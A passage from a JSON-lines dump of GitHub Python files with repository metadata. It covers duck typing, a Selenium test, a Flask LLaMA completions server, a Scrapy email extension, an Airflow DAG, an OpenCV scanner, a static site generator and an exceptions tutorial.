Permission.\n\nclass DuckT:\n\n def quack(self):\n print('Quack, quack')\n\n def fly(self):\n print('flap, flap!')\n\n\nclass Person:\n\n def quack(self):\n print('I am quacking like a duck')\n\n def fly(self):\n print('I am flapping my Arms!')\n\n# The below method is not Pythonic at all.\ndef quack_and_fly(thing):\n #THE following is not Pythonic.\n if hasattr(thing, 'quack'):\n if callable(thing.quack):\n thing.quack()\n \n if hasattr(thing, 'fly'):\n if callable(thing.fly):\n thing.fly()\n # The following example is not duck typed and hence non pythonic.\n #if isinstance(thing, DuckT): #\n thing.quack()\n thing.fly()\n #else:\n # print('This has to be a duck!')\n\n print()\n\ndef quack_and_fly_pythonic(thing):\n #Example of DUCK TYPING:\n # thing.quack()\n # thing.fly()\n \n # This is Pythonic as well.\n try:\n thing.quack()\n thing.fly()\n thing.bark()\n except AttributeError as e:\n print(e)\n\n print()\n\n\n\nd = DuckT()\nquack_and_fly_pythonic(d)\n\np = Person() # In duck typing if person behaves like a duck (i.e. has quack and fly methods) it is a DUCK!!\nquack_and_fly(p)\n\n\n\n","repo_name":"ameerhkhan/Python-Practice-Exercises","sub_path":"ductyping/ducktyping_explain.py","file_name":"ducktyping_explain.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1406591515","text":"import unittest\nfrom selenium import webdriver\n\nclass BaiduTest(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n print('类级别的准备工作')\n cls.driver = webdriver.Chrome()\n\n\n def test_baidu_title(self):\n url = 'https://www.baidu.com/'\n BaiduTest.driver.get(url)\n print('验证百度首页的标题')\n title = self.__class__.driver.title\n self.assertEqual(title,'百度一下,你就知道')\n\n @unittest.skip('暂时跳过')\n def test_baidu_zhidao_title(self):\n url = 'https://zhidao.baidu.com/'\n self.__class__.driver.get(url)\n print('验证百度知道的标题')\n title = self.__class__.driver.title\n self.assertTrue('全球领先' in title)\n\n @classmethod\n def tearDownClass(cls):\n print('类级别的清理工作')\n cls.driver.quit()\n\nif __name__ == '__main__':\n unittest.main(verbosity=1)","repo_name":"guozizheng1/VIP_Selenium","sub_path":"SEC08/test_case_02.py","file_name":"test_case_02.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1010026337","text":"import itertools\nimport json\nimport logging\nimport os\nfrom multiprocessing import Process, Queue\nfrom pathlib import Path\nfrom queue import Empty\nfrom time import sleep, time\nfrom typing import Any, Dict, List, NamedTuple, Optional, Tuple\nfrom uuid import uuid4\n\nimport sentry_sdk\nfrom sentry_sdk.integrations.flask import FlaskIntegration\nimport torch\nfrom flask import Flask, jsonify, make_response, Response, request\nfrom waitress import serve\nfrom fairscale.nn.model_parallel.initialize import initialize_model_parallel, get_model_parallel_group\nfrom llama import ModelArgs, Transformer, Tokenizer, LLaMA\nimport click\n\n\nDEFAULT_HOST = '0.0.0.0'\nDEFAULT_PORT = 8000\nDEFAULT_LOG_LEVEL = 'INFO'\nDEFAULT_MAX_SEQ_LEN = 512\nDEFAULT_MAX_BATCH_SIZE = 32\nDEFAULT_MAX_TOKENS = 16\nDEFAULT_TEMPERATURE = 1.\nDEFAULT_TOP_P = 1.\nDEFAULT_NUM_RETURN_SEQUENCES = 1\nDEFAULT_PROMPT = 'Hello world!'\nFINISH_REASON_EOS = 'stop'\nFINISH_REASON_LENGTH = 'length'\nSYNC_INTERVAL = 0.2\nDEFAULT_SYNC_FILE = Path('sandle.lock')\n\nwith open('models.json') as f:\n MODELS = json.load(f)\n\n\ndef setup_model_parallel() -> Tuple[int, int]:\n local_rank = int(os.environ.get('LOCAL_RANK', -1))\n world_size = int(os.environ.get('WORLD_SIZE', -1))\n\n torch.distributed.init_process_group('nccl')\n initialize_model_parallel(world_size)\n torch.cuda.set_device(local_rank)\n\n # seed must be the same in all processes\n torch.manual_seed(1)\n return (local_rank, world_size)\n\n\ndef load(\n ckpt_dir: Path,\n tokenizer_path: Path,\n local_rank: int,\n world_size: int,\n max_seq_len: int,\n max_batch_size: int,\n) -> LLaMA:\n checkpoints = sorted(ckpt_dir.glob('*.pth'))\n if not checkpoints:\n raise Exception(f'Found no checkpoints under {ckpt_dir}')\n elif world_size != len(checkpoints):\n raise Exception(f'Started {world_size} processes but found {len(checkpoints)} (!= {world_size}) checkpoints')\n ckpt_path = checkpoints[local_rank]\n logging.info(f'Loading model from {ckpt_dir} (tokenizer: {tokenizer_path})')\n checkpoint = torch.load(str(ckpt_path), map_location='cpu')\n with open(ckpt_dir / 'params.json', mode='r') as f:\n params = json.loads(f.read())\n\n model_args = ModelArgs(max_seq_len=max_seq_len, max_batch_size=max_batch_size, **params)\n tokenizer = Tokenizer(model_path=str(tokenizer_path))\n model_args.vocab_size = tokenizer.n_words\n torch.set_default_tensor_type(torch.cuda.HalfTensor) # type: ignore\n model = Transformer(model_args)\n torch.set_default_tensor_type(torch.FloatTensor)\n model.load_state_dict(checkpoint, strict=False)\n\n return LLaMA(model, tokenizer)\n\n\ndef generate_response_id() -> str:\n return str(uuid4())\n\n\ndef get_timestamp() -> int:\n return int(time())\n\n\ndef truncate_at_stops(text: str, stop_strings: List[str]) -> Tuple[str, bool]:\n truncated = False\n for s in stop_strings:\n index = text.find(s)\n if index >= 0:\n text = text[:index]\n truncated = True\n return (text, truncated)\n\n\nclass Completion(NamedTuple):\n text: str\n finish_reason: Optional[str]\n idx: int\n\n @classmethod\n def from_truncation(cls, truncation: Tuple[str, bool], idx: int = 0):\n (text, truncated) = truncation\n return cls(text=text, finish_reason=FINISH_REASON_EOS if truncated else FINISH_REASON_LENGTH, idx=idx)\n\n\ndef make_api_completions(\n response_id: str, created: int, model_id: str, completions: List[Completion]\n) -> Dict[str, Any]:\n return {\n 'id': response_id,\n 'object': 'text_completion',\n 'created': created,\n 'model': model_id,\n 'choices': [\n {\n 'text': completion.text,\n 'index': completion.idx,\n 'logprobs': None,\n 'finish_reason': completion.finish_reason\n }\n for completion in completions\n ],\n 'usage': {'prompt_tokens': 0, 'completion_tokens': 0, 'total_tokens': 0},\n }\n\n\ndef make_error_response(status: int, message: str, error_type: str,\n param: Optional[Any] = None, code: Optional[str] = None) -> Response:\n return make_response((\n {\n 'error': {\n 'message': message,\n 'type': error_type,\n 'param': param,\n 'code': code,\n },\n },\n status,\n ))\n\n\nclass GenerateArgs(NamedTuple):\n args: Tuple[Any]\n kwargs: Dict[str, Any]\n\n\ndef create_app(model_id: str, generate_queue: Queue) -> Flask:\n app = Flask(__name__)\n\n @app.errorhandler(404)\n def invalid_url(error):\n return make_error_response(\n 404,\n f'Invalid URL ({request.method} {request.path})',\n 'invalid_request_error',\n )\n\n @app.errorhandler(405)\n def invalid_method(error):\n return make_error_response(\n 405,\n (\n f'Not allowed to {request.method} on {request.path} '\n '(HINT: Perhaps you meant to use a different HTTP method?)'\n ),\n 'invalid_request_error',\n )\n\n @app.errorhandler(500)\n def internal_server_error(error):\n return make_error_response(\n 500,\n 'The server encountered an internal error',\n 'internal_server_error',\n )\n\n @app.route('/v1/models')\n def get_models():\n return jsonify({\n 'data': [model_data for model_data in MODELS if model_data['id'] == model_id],\n 'object': 'list'\n })\n\n @app.route('/v1/completions', methods=['POST'])\n def post_completions():\n if not request.is_json:\n return make_error_response(\n 400,\n (\n 'Your request does not have a JSON Content-Type header. '\n 'The API expects \"Content-Type: application/json\".'\n ),\n 'invalid_request_error',\n )\n\n try:\n request_json = request.get_json()\n if not isinstance(request_json, dict):\n raise Exception('Request body is not a JSON dictionary')\n except Exception:\n return make_error_response(\n 400,\n (\n 'We could not parse the JSON body of your request. '\n '(HINT: This likely means you aren\\'t using your HTTP library correctly. '\n 'The API expects a JSON payload, but what was sent was not valid JSON.'\n ),\n 'invalid_request_error',\n )\n\n try:\n max_tokens = int(request_json.get('max_tokens', DEFAULT_MAX_TOKENS))\n\n requested_model_id = request_json['model']\n if requested_model_id != model_id:\n raise Exception(f'model must be {model_id}')\n\n prompt = request_json.get('prompt', DEFAULT_PROMPT)\n if not isinstance(prompt, str):\n raise Exception('prompt must be a string')\n\n _stop = request_json.get('stop')\n if isinstance(_stop, list):\n stops = _stop\n elif isinstance(_stop, str):\n stops = [_stop]\n else:\n stops = []\n\n if stops:\n logging.warning('Stop sequences are implemented naively')\n\n num_return_sequences = int(request_json.get('n', DEFAULT_NUM_RETURN_SEQUENCES))\n\n stream = request_json.get('stream', False)\n if stream:\n raise NotImplementedError('Streaming is not implemented')\n\n temperature = float(request_json.get('temperature', DEFAULT_TEMPERATURE))\n\n greedy_decoding = request_json.get('greedy_decoding', False)\n if greedy_decoding:\n temperature = 0\n\n top_p = float(request_json.get('top_p', DEFAULT_TOP_P))\n\n user = request_json.get('user')\n sentry_sdk.set_user({'id': user} if user else None)\n\n completion_log_text = 'completion' if num_return_sequences == 1 else 'completions'\n tokens_log_text = 'token' if max_tokens == 1 else 'tokens'\n if num_return_sequences != 1:\n tokens_log_text = tokens_log_text + ' each'\n logging.debug(f'Computing {completion_log_text} of up to {max_tokens} {tokens_log_text} for user {user}')\n\n except Exception as ex:\n return make_error_response(\n 400,\n str(ex),\n 'invalid_request_error',\n )\n\n # Ensure generate queue is empty before putting data in\n queue_empty = False\n while not queue_empty:\n try:\n generate_queue.get_nowait()\n except Empty:\n queue_empty = True\n\n response_id = generate_response_id()\n created = get_timestamp()\n prompts = [prompt] * num_return_sequences\n generate_queue.put(GenerateArgs(\n args=(prompts,),\n kwargs=dict(\n max_gen_len=max_tokens,\n temperature=temperature,\n top_p=top_p,\n ),\n ))\n api_completions = make_api_completions(\n response_id,\n created,\n model_id,\n [\n Completion.from_truncation(truncate_at_stops(raw_completion_text[len(prompt):], stop_strings=stops), i)\n for (i, raw_completion_text) in enumerate(generate_queue.get())\n ],\n )\n return jsonify(api_completions)\n\n return app\n\n\ndef serve_app(model_id: str, generate_queue: Queue, **waitress_kwargs):\n app = create_app(model_id, generate_queue)\n serve(app, **waitress_kwargs)\n\n\n@click.command()\n@click.argument('llama_dir', type=click.Path(exists=True, file_okay=False, path_type=Path))\n@click.argument('model_size', type=click.Choice(tuple(model_data['id'].split('-')[-1] for model_data in MODELS)))\n@click.option('--host', type=str, default=DEFAULT_HOST, help='Hostname or IP to serve on')\n@click.option('-p', '--port', type=int, default=DEFAULT_PORT, help='Port to serve on')\n@click.option('-l', '--log-level', type=click.Choice(('CRITICAL', 'ERROR', 'WARNING', 'INFO', 'DEBUG')),\n default=DEFAULT_LOG_LEVEL, help='Logging verbosity level threshold (to stderr)')\n@click.option('--max-seq-len', type=int, default=DEFAULT_MAX_SEQ_LEN, help='Maximum sequence length')\n@click.option('--max-batch-size', type=int, default=DEFAULT_MAX_BATCH_SIZE, help='Maximum batch size')\n@click.option('--sync-file', type=click.Path(dir_okay=False, file_okay=False, path_type=Path),\n default=DEFAULT_SYNC_FILE,\n help='File path to use for synchronizing processes/threads (must be unique; file must not exist)')\ndef main(\n llama_dir: Path,\n model_size: str,\n host: str = DEFAULT_HOST,\n port: int = DEFAULT_PORT,\n log_level: str = DEFAULT_LOG_LEVEL,\n max_seq_len: int = DEFAULT_MAX_SEQ_LEN,\n max_batch_size: int = DEFAULT_MAX_BATCH_SIZE,\n sync_file: Path = DEFAULT_SYNC_FILE,\n):\n \"\"\"\n Run a simplified, single-threaded clone of OpenAI's /v1/completions endpoint on the LLaMA model at\n LLAMA_DIR/MODEL_SIZE using the tokenizer at LLAMA_DIR/tokenizer.model .\n \"\"\"\n logging.basicConfig(format='[%(asctime)s] [%(levelname)s] [%(process)d] [%(name)s] %(message)s',\n level=log_level)\n\n sentry_sdk.init(\n integrations=[\n FlaskIntegration(),\n ],\n traces_sample_rate=0.1,\n )\n sentry_sdk.set_tag('component', 'backend-llama')\n\n model_id = f'llama-{model_size}'\n ckpt_dir = llama_dir / model_size\n tokenizer_path = llama_dir / 'tokenizer.model'\n\n (local_rank, world_size) = setup_model_parallel()\n logging.info(f'Local rank: {local_rank}')\n\n rank_0_generate_queue: Optional[Queue] = None\n rank_0_server_process: Optional[Process] = None\n if local_rank == 0:\n rank_0_generate_queue = Queue()\n rank_0_server_process = Process(\n target=serve_app,\n args=(model_id, rank_0_generate_queue),\n kwargs=dict(host=host, port=port, threads=1),\n )\n rank_0_server_process.start()\n\n generator = load(ckpt_dir, tokenizer_path, local_rank, world_size, max_seq_len, max_batch_size)\n\n try:\n # Ensure sync_file is created before any rank attempts to access it\n sync_file.touch()\n\n for loop_num in itertools.count(start=0):\n logging.debug(f'Starting loop {loop_num}')\n\n # Rank 0 gets new generate args from queue\n # We implement a crude file-based barrier to work around NCCL timeouts\n if rank_0_generate_queue is not None: # local_rank == 0\n generate_args_list = [rank_0_generate_queue.get()]\n sync_file.write_text(str(loop_num))\n else:\n generate_args_list = [None]\n while sync_file.read_text() != str(loop_num):\n sleep(SYNC_INTERVAL)\n\n # Rank 0 broadcasts args to other ranks\n torch.distributed.broadcast_object_list(generate_args_list, src=0, group=get_model_parallel_group())\n\n # All ranks process args\n [generate_args] = generate_args_list\n completed_prompts = generator.generate(*generate_args.args, **generate_args.kwargs)\n\n # Rank 0 puts completions onto queue\n if rank_0_generate_queue is not None: # local_rank == 0\n rank_0_generate_queue.put(completed_prompts)\n\n finally:\n if rank_0_generate_queue is not None and rank_0_server_process is not None: # local_rank == 0\n sync_file.unlink()\n rank_0_generate_queue.close()\n rank_0_server_process.join()\n\n\nif __name__ == '__main__':\n main(auto_envvar_prefix='SANDLE')\n","repo_name":"hltcoe/sandle","sub_path":"backend-llama/serve-backend-llama.py","file_name":"serve-backend-llama.py","file_ext":"py","file_size_in_byte":13857,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"16330881027","text":"import glob\nimport filecmp\nfrom scrapy import signals\nfrom scrapy.exceptions import NotConfigured\nfrom scrapy.mail import MailSender\n\nclass EmailOnChange(object):\n\n def __init__(self,destination, mailer):\n self.destination = destination\n self.mailer = mailer\n \n @classmethod\n def from_crawler(cls,crawler):\n if not crawler.settings.getbool(\"EMAIL_ON_CHANGE_ENABLED\"):\n raise NotConfigured\n if not crawler.settings.get(\"EMAIL_ON_CHANGE_DESTINATION\"):\n raise NotConfigured(\"EMAIL_ON_CHANGE_DESTINATION must be provided\")\n\n mailer = MailSender.from_settings(crawler.settings)\n destination = crawler.settings.get(\"EMAIL_ON_CHANGE_DESTINATION\")\n \n extension = cls(destination, mailer)\n\n crawler.signals.connect(extension.engine_stopped,signal=signals.engine_stopped)\n\n return extension\n\n def engine_stopped(self):\n #print(\"\\n\\n\\n EXTENSION WAS RUN \\n\\n\\n\")\n runs = sorted(glob.glob(\"/tmp/[0-9]*-[0-9]*-[0-9]*T[0-9]*-[0-9]*-[0-9]*.json\"), reverse=True)\n\n if len(runs) < 2:\n return\n current_file,previous_file = runs[0:2]\n\n if not filecmp.cmp(current_file,previous_file):\n print(\"\\n\\n\\n The files are different \\n\\n\\n\")\n with open (current_file) as f:\n self.mailer.send(\n to=[self.destination],\n subject=\"dataset changed\",\n body=\"changes in datasets detected, see attachment\",\n attachs=[(current_file.split('/')[-1], 'application/json',f)]\n )\n else:\n print(\"\\n\\n\\n no change \\n\\n\\n\")\n\n","repo_name":"dvpcloud/datacrawler","sub_path":"datachecker/extensions.py","file_name":"extensions.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25049512658","text":"from airflow import DAG\nfrom datetime import datetime\nfrom airflow.providers.postgres.operators.postgres import PostgresOperator\n\n\n\nwith DAG(dag_id='time_tracking', start_date=datetime(2022, 1, 1), \n schedule_interval='@daily', catchup=False) as dag:\n\n creating_table = PostgresOperator(\n task_id='creating_table',\n postgres_conn_id='postgres',\n sql='''\n CREATE TABLE IF NOT EXISTS myTime (\n curr_time TIMESTAMP\n );\n '''\n )\n \n inserting_values = PostgresOperator(\n task_id = 'inserting_values',\n postgres_conn_id='postgres',\n sql = '''\n INSERT INTO myTime VALUES (CURRENT_TIMESTAMP); \n '''\n )\n \n creating_table >> inserting_values","repo_name":"Sonali-Gudey/Docker-Kubernetes-Assignment","sub_path":"Docker_Assignment/dags/create_database_postgres.py","file_name":"create_database_postgres.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36828810215","text":"import numpy as np\nimport cv2\n\n# Document Scanner:\n# Draws contour around document.\n# Documents must be flat over a surface\n\n\ncap = cv2.VideoCapture(0)\n\nwhile(True):\n\tret, original = cap.read()\n\tgray = cv2.cvtColor(original,cv2.COLOR_BGR2GRAY)\n\t#gray = cv2.GaussianBlur(gray, (5, 5), 0)\n\t#_, thresh = cv2.threshold(gray,127,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n\tedged = cv2.Canny(gray, 100, 200)\n\t(_,cnts, _) = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\tcnts = sorted(cnts, key = cv2.contourArea, reverse = True)[:5]\n\t\n\t# loop over the contours\n\tfor c in cnts:\n\t\t# approximate the contour\n\t\tperi = cv2.arcLength(c, True)\n\t\tapprox = cv2.approxPolyDP(c, 0.02 * peri, True)\n\t \n\t\t# if our approximated contour has four points, then we\n\t\t# can assume that we have found our screen\n\t\tif len(approx) == 4:\n\t\t\tscreenCnt = approx\n\t\t\tbreak\n\t\n\tif screenCnt.any():\n\t\tcv2.drawContours(original, [screenCnt], -1, (0, 255, 0), 2)\n\tcv2.imshow('debug', edged)\n\tcv2.imshow('original', original)\n\tif cv2.waitKey(1) & 0xFF == ord('q'):\n\t\tbreak\n\n\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"jorgelopezrivas/opencv-learning","sub_path":"doc-scanner.py","file_name":"doc-scanner.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2931254036","text":"import os\r\nfrom tkinter import messagebox as mb\r\ndef renameing(file_path,file_name,new_file_name):\r\n chosenFile = f'{file_path}/{file_name}'\r\n path1 = os.path.dirname(chosenFile)\r\n extension = os.path.splitext(chosenFile)[1]\r\n newName = new_file_name\r\n path = os.path.join(path1, newName + extension)\r\n os.rename(chosenFile, path)\r\n mb.showinfo('confirmation', \"File Renamed !\")\r\n\r\n","repo_name":"RoHiT-engi/File_Manager","sub_path":"Rename_a_file.py","file_name":"Rename_a_file.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7900273043","text":"\"\"\"TextBlock\n# Site Generator Script:\nCreated: ~0325hrs IST, 28th Oct 2023\n\nI started writing this script first as a standalone module, then thought about\nworking with it as a full-fledged Python module that I could build and maybe\neven package as a single unit. That led me nowhere, so I briefly considered\npursuing golang or rust to build this as a binary that I could just drop into\nthe dir containing my notes and have it generate a blog, but that made no \nsense either.\n\nFinally, I think I have a solution that makes sense. What I want to do is\nto embed content into Python files directly as ReStructured Text in \ndoctring-style string blocks, and then use these to form the bodies of the\ntext. I can then think about embedding the code between text content or \nsomething, or maybe making it so that I can set the strings as variables\nand reference them in some Python-compliant way that doesn't affect the code,\nbut makes sense in context of the text.\n\nWhy do this at all? I think there's some sense in making code more literate\nin some ways that don't have to do with the programming paradigms used to\ncompose the code in the first place. Also, working like this allows more\ndynamic use of Python's abilities to compose or alter the text, or to imbue\nvalues in the text at publishing time, or embed external content with better\nease. Also, I don't know right now if this will work. So, yeah.\n\nAnd this script should be able to fulfil that role, so I can maybe start\nactually writing and stop ruminating so much.\n\"\"\"\n\nimport json\nimport logging\nimport os\nimport re\nimport shutil\nimport signal\nimport sys\n\nfrom collections import defaultdict\nfrom docutils.core import publish_parts\nfrom markdown import markdown\nfrom pathlib import Path, PosixPath\nfrom rst2html5_ import HTML5Writer\nfrom typing import List, Dict, Tuple\n\nSUPPORTED_TYPES = {\".py\", \".rst\", \".md\"}\nCURDIR_PATH = Path.cwd()\nEXEC_PATH = Path(__file__).parent.absolute()\nif CURDIR_PATH == EXEC_PATH:\n OUTPUT_PATH = Path(os.path.join(CURDIR_PATH, \"output\"))\n SOURCE_PATH = Path(os.path.join(CURDIR_PATH, \"source\"))\nelse:\n OUTPUT_PATH, SOURCE_PATH = CURDIR_PATH, CURDIR_PATH\nBASE_TEMPLATE_PATH = Path(os.path.join(CURDIR_PATH, \"template/base.html\"))\nBASE_TEMPLATE_DEPENDENCIES = (\n Path(os.path.join(CURDIR_PATH, \"template/style.css\")),\n Path(os.path.join(CURDIR_PATH, \"template/scripts.js\")),\n Path(os.path.join(CURDIR_PATH, \"template/8BITWONDERNominal.woff2\")),\n Path(os.path.join(CURDIR_PATH, \"template/favicon.png\")),\n Path(os.path.join(CURDIR_PATH, \"template/pattern-min.svg\")),\n)\n\nlogger = logging.getLogger(\"sitemake\")\nlogger.setLevel(logging.DEBUG)\nch = logging.StreamHandler()\nch.setLevel(logging.INFO)\n\nformatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\n\ndef parse_source_files(dir_path: str) -> Dict:\n PathObj = Path(dir_path)\n dir_list = []\n file_list = []\n paths_dir_map = defaultdict(list)\n\n for item in PathObj.iterdir():\n if item.name[0] == \".\":\n continue\n if item.is_dir():\n dir_list.append(item)\n elif item.is_file():\n file_list.append(item)\n\n # recursive traversal here to get all the paths and file items\n for dir_item in dir_list:\n subdir_paths_dir_map = parse_source_files(dir_item)\n for k, v in subdir_paths_dir_map.items():\n paths_dir_map[k].extend(v)\n for file_item in file_list:\n if not isinstance(file_item, PosixPath):\n continue\n if file_item.suffix.lower() in {\".py\", \".md\", \".rst\", \".pdf\"}:\n logger.debug(\"valid file: \", file_item.name)\n dir_rel_path = str(file_item.parent.relative_to(CURDIR_PATH))\n paths_dir_map[dir_rel_path].append(file_item.name)\n logger.debug(paths_dir_map)\n return paths_dir_map\n\n\ndef clear_output_directory(output_base_dir: Path):\n dir_list = []\n file_list = []\n paths_dir_map = defaultdict(list)\n for item in output_base_dir.iterdir():\n if item.is_dir():\n dir_list.append(item)\n elif item.is_file():\n file_list.append(item)\n\n # recursive traversal here to get all the paths and file items\n for dir_item in dir_list:\n clear_output_directory(dir_item)\n os.rmdir(dir_item)\n for file_item in file_list:\n if not isinstance(file_item, PosixPath):\n raise Exception(\n \"Could not delete file, Invalid filepath: {}\".format(str(file_item))\n )\n else:\n os.remove(file_item)\n\n logger.debug(paths_dir_map)\n return\n\n\ndef handle_file_parse(inpath: Path, outpath: Path):\n base_template_html = BASE_TEMPLATE_PATH.read_text()\n if inpath.suffix != \".pdf\":\n if inpath.suffix in (\".rst\", \".py\"):\n html = publish_parts(writer=HTML5Writer(), source=inpath.read_text())[\n \"body\"\n ]\n else:\n parsed_doc = inpath.read_text()\n\n parsed_text = []\n for line in parsed_doc.split(\"\\n\"):\n parsed_text.append(line.replace(\".md)\", \".html)\"))\n\n html = markdown(\"\\n\".join(parsed_text))\n outpath.write_text(base_template_html.format(body_content=html))\n else:\n outpath.write_bytes(inpath.read_bytes())\n pass\n\n\ndef generate_output_paths(output_base_dir, source_map: Dict[str, str]):\n if not output_base_dir.exists():\n os.makedirs(output_base_dir)\n for path in BASE_TEMPLATE_DEPENDENCIES:\n op_name = os.path.join(output_base_dir, path.name)\n shutil.copy(path, op_name)\n\n output_map = {}\n for dir, file_list in source_map.items():\n output_dir_path = Path(os.path.join(CURDIR_PATH, f\"output{dir[6:]}\"))\n if not output_dir_path.exists():\n os.makedirs(output_dir_path)\n\n for filename in file_list:\n source_file_path = \"/\".join(\n (\n dir,\n filename,\n )\n )\n source_file_path_abs = os.path.realpath(source_file_path)\n output_path_object = Path(os.path.join(output_dir_path, filename))\n output_path_object.touch()\n if Path(source_file_path_abs).suffix != \".pdf\":\n output_path_object = output_path_object.rename(\n output_path_object.with_suffix(\".html\")\n )\n handle_file_parse(Path(source_file_path_abs), output_path_object)\n output_map[str(output_path_object)] = source_file_path_abs\n return output_map\n\n\n# TODO: first create directories, then generate nav, then populate files, and finally use\n# nav to verify that all files have been created\ndef generate_nav(output_base_dir, output_map: dict = {}) -> List:\n nav_map = defaultdict(Dict)\n nav_abspath = lambda x: f\"Index/{os.path.relpath(x, output_base_dir)}\"\n nav_list = [nav_abspath(k) for k in output_map.keys()]\n return nav_list\n\n\ndef parse_dir_paths(project_path):\n # static site component stuff will go here\n paths_dir_map = parse_source_files(project_path)\n logger.info(json.dumps(paths_dir_map, indent=4))\n\n project_path_obj = Path(project_path)\n output_dir = Path(os.path.join(OUTPUT_PATH, project_path_obj.name))\n return paths_dir_map, output_dir\n\n\ndef confirm_source_path(possible_paths: tuple) -> int:\n while True:\n print(\"Choose a project by num:\")\n input_args = \"\\n\".join(\n [\" \".join((f\"{i[0] + 1}. \", i[1])) for i in enumerate(possible_paths)],\n )\n check_path = input(f\"{input_args} \\nProject num ->: \")\n if check_path.isnumeric() and 0 < int(check_path) <= len(possible_paths):\n return possible_paths[int(check_path) - 1]\n else:\n print(\"Invalid input.\")\n continue\n\n\ndef setup_output():\n print(f\"Current path: {str(CURDIR_PATH)}\")\n print(f\"Sitemake path: {str(EXEC_PATH)}\")\n if not OUTPUT_PATH.exists():\n print(\"OUTPUT dir does not exist. Creating...\")\n OUTPUT_PATH.mkdir()\n print(f\"OUTPUT path: {str(OUTPUT_PATH)}\")\n if not SOURCE_PATH.exists():\n print(\"TARGET dir does not exist. Creating...\")\n SOURCE_PATH.mkdir()\n print(f\"TARGET path: {str(SOURCE_PATH)}\")\n\n print(\"Checking source path contents...\")\n source_list = tuple(str(i) for i in SOURCE_PATH.iterdir() if i.is_dir())\n source_path = confirm_source_path(source_list)\n return source_path\n\n\ndef main():\n source_project = setup_output()\n source_paths, output_base_dir = parse_dir_paths(source_project)\n if output_base_dir.exists():\n clear_output_directory(output_base_dir)\n os.rmdir(output_base_dir)\n output_paths = generate_output_paths(output_base_dir, source_paths)\n nav = generate_nav(output_base_dir, output_paths)\n logger.info(json.dumps(nav, indent=4))\n\n\ndef handle_signal(sig, frame):\n print(\"\\nHandled SIGINT\\nExiting now...\")\n sys.exit(0)\n\n\nsignal.signal(signal.SIGINT, handle_signal)\n\n\nif __name__ == \"__main__\":\n print(\"Print Ctrl+C to exit\")\n main()\n","repo_name":"essnine/script-post-self","sub_path":"sitemake.py","file_name":"sitemake.py","file_ext":"py","file_size_in_byte":9097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18525073743","text":"# errors and exception\n# program returns errors or exception due to exception or syntax error \n\n#a = 5 print(5) # syntax error\n#a = 5 \n#print(a)) # syntax error\n#a = 5 + '10' # type error\n# import somemodule # module not found error \n# f = open('filenotfound.txt') # file not found error \n\na = [1,2,3]\n#a[4] # index error\n\ndict = {\"name\":\"alice\"}\n# dict['age'] # key error\n\n# raise exception\nx = -1 \n# if x < 0:\n# raise Exception('x should be positive') #Exception: x should be positive\n\n# assert(x>=0), 'x should >= 0' # return True if match ,AssertionError\n\n# catch exception \ntry:\n a = 5/0\n# except Exception as e:\n # print('error divide by 0')\n # print(e)\nexcept ZeroDivisionError as e :\n print(e)\nexcept TypeError as e:\n print(e)\nelse: \n print(\"no exception\")\nfinally: \n print(\"cleaning up...\") # always run \n\nclass ValueTooHighError(Exception):\n pass \n\nclass ValueTooSmallError(Exception):\n def __init__(self, message, value):\n self.message = message \n self.value = value \n\ndef test_value(x):\n if x >100 :\n raise ValueTooHighError('value is too high')\n if x < 5:\n raise ValueTooSmallError('value too small', x)\ntry:\n test_value(200)\nexcept ValueTooHighError as e:\n print(e)\nexcept ValueTooSmallError as e:\n print(e.message, e.value)\n\n","repo_name":"feimvnc/ml-python","sub_path":"python-programming/exceptions/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13724696013","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jan 08 13:37:39 2017\r\n\r\n@author: Stergios\r\n\"\"\"\r\n\r\nreplace_characters = {u'ó' : 'o',\r\n u'ã' : 'a',\r\n u'ü' : 'u',\r\n u'í' : 'i',\r\n u'é' : 'e'}\r\n\r\ndriver_mapping = {'hamilton' : 'Lewis Hamilton',\r\n 'heidfeld' : 'Nick Heidfeld',\r\n 'rosberg' : 'Nico Rosberg',\r\n 'alonso' : 'Fernando Alonso',\r\n 'kovalainen' : 'Heikki Kovalainen',\r\n 'nakajima' : 'Kazuki Nakajima',\r\n 'bourdais' : 'Sebastien Bourdais',\r\n 'raikkonen' : 'Kimi Raikkonen',\r\n 'kubica' : 'Robert Kubica',\r\n 'glock' : 'Timo Glock',\r\n 'sato' : 'Takuma Sato',\r\n 'piquet_jr' : 'Nelson Piquet Jr.',\r\n 'massa' : 'Felipe Massa',\r\n 'coulthard' : 'David Coulthard',\r\n 'trulli' : 'Jarno Trulli',\r\n 'sutil' : 'Adrian Sutil',\r\n 'webber' : 'Mark Webber',\r\n 'button' : 'Jenson Button',\r\n 'davidson' : 'Anthony Davidson',\r\n 'vettel' : 'Sebastian Vettel',\r\n 'fisichella' : 'Giancarlo Fisichella',\r\n 'barrichello' : 'Rubens Barrichello',\r\n 'ralf_schumacher' : 'Ralf Schumacher',\r\n 'liuzzi' : 'Vitantonio Liuzzi',\r\n 'wurz' : 